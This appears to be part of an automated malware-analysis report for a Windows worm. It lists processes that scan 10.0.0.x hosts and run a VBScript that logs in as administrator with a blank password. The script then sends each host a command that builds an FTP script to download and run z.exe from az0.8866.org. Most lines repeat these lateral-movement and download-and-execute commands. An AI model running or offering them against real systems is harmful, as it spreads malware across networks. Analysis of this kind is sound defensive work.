  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.68 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.143 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.125 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.111 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.112 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.113 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.114 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.115 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.116 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.117 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.118 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.119 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.120 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.121 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.122 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.123 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.124 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.108 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.141 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.127 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.128 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.129 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.130 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.131 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.132 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.133 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.134 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.135 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.136 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.137 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.138 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.139 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.140 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.142 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.159 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.69 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.56 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.16 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.14 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.17 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.21 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.22 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.19 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.23 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.20 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.24 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.25 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.26 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.21 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.22 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.27 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.28 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.32 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.24 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.26 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.29 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.25 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.30 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.31 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.32 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.27 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.28 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.29 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.33 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.31 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.34 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.35 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.13 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.23 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.15 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.9 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.1 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.2 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.3 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.4 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.5 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.3 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.6 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.1 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.7 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.8 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.6 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.2 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.4 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.5 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.10 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.11 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.11 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.12 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.13 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.14 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.7 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.8 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.9 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.15 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.16 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.17 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.18 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.10 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.19 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.20 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.12 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.45 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.66 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.37 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.54 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.55 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.56 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.53 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.51 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.55 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.57 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.52 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.58 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.54 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.59 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.60 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.61 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.62 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.57 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.36 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.60 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.58 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.59 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.61 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.62 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.63 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.64 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.65 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.66 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.67 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.68 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.63 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.64 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.65 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.53 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.67 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.52 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.40 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.38 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.33 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.34 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.39 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.35 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.37 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.40 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.36 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.41 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.38 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.42 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.43 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.44 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.39 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.30 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.51 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.46 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.43 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.41 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.47 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.42 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.44 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.48 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.49 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.50 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.45 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.47 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.46 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.49 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.48 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.50 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.176 :
Executes the following:
  • '<SYSTEM32>\mshta.exe' "%ProgramFiles%\KHO.hta"
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.98 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.99 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.100 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.101 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.102 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.103 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
